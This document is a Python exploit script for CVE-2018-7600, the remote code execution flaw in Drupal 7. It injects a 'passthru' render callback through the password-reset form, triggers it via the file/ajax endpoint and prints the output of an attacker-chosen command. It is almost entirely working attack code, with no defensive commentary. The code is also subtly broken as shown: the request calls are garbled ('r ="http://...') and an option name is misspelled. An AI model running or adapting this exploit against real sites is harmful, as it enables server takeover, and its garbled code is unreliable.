import sys import requests import getopt from bs4 import BeautifulSoup URL = '?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=' PAYLOAD = {'form_id':'user_pass', '_triggering_element_name':'name'} SECOND_URL = "?q=file/ajax/name/%23value/" DEFAULT_PORT = 80 def usage(): print("CVE-2018-7600 Remote Code Execution in drupal 7") print() print("Flags:") print("{} - Target url".format("\t-t --target".ljust(20," "))) print("{} - Port of webserver".format("\t-p --port".ljust(20," "))) print("{} - Command to be executed".format("\t-c --command".ljust(20," "))) print() def main(): if len(sys.argv) > 1: try: opts,args = getopt.getopt(sys.argv[1:],"t:p:c:",["target","port","command"]) except getopt.GetoptError as e: print(str(e)) usage() sys.exit(1) target = None command = None port = DEFAULT_PORT for o,a in opts: if o in ("-t","--target"): target = a elif o in ("-c","--comand"): command = a elif o in ("-p","--port"): try: port = int(a) except ValueError: print("[!] Invalid port provided, must be an int") sys.exit(1) else: print("[!] Invalid option {}".format(o)) else: print("[!] Must provide target url and command") sys.exit(1) quit = False if target is None: print("[!] Must provide target with -t or --target") quit = True if command is None: print("[!] Must provide command with -c or --command") quit = True if quit: sys.exit(1) print("[+] Sending command exploit") r ="http://{}:{}{}{}".format(target, port, URL, command), data=PAYLOAD) soup = BeautifulSoup(r.text, "html.parser") try: print("[+] Prepping trigger") target_form = soup.find('form', {'id':'user-pass'}) form_build_id = target_form.find('input', {'name':'form_build_id'}).get('value') second_payload = {'form_build_id':form_build_id} print("[+] Sending trigger") trigger ="http://{}:{}{}{}".format(target, port, SECOND_URL, form_build_id), data=second_payload) result = trigger.text.split('[{"command":"settings"')[0] print("[+] Result: {}".format(result)) except: print("[!] Error in html parsing") sys.exit(1) if __name__ == '__main__': main()